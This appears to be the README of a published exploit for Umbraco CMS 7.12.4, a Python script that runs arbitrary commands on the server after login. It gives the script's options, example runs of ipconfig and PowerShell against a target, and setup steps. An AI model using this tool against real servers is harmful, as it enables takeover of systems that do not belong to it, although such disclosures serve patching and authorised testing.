Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
[EDB-49488] [PacketStorm] [WLB-2020080012]
$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
Umbraco authenticated RCE
optional arguments:
-h, --help show this help message and exit
-u USER, --user USER username / email
-p PASS, --password PASS password
-i URL, --host URL root URL
-c CMD, --command CMD command
-a ARGS, --arguments ARGS arguments
Examples:
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'
Example for ArchLinux:
pacman -S python-beautifulsoup4 python-requests
Example using pip:
pip3 install -r requirements.txt
This is a better re-write of EDB-ID-46153 using arguments (instead of harcoded values) and with stdout display.
Tested with python 3.8.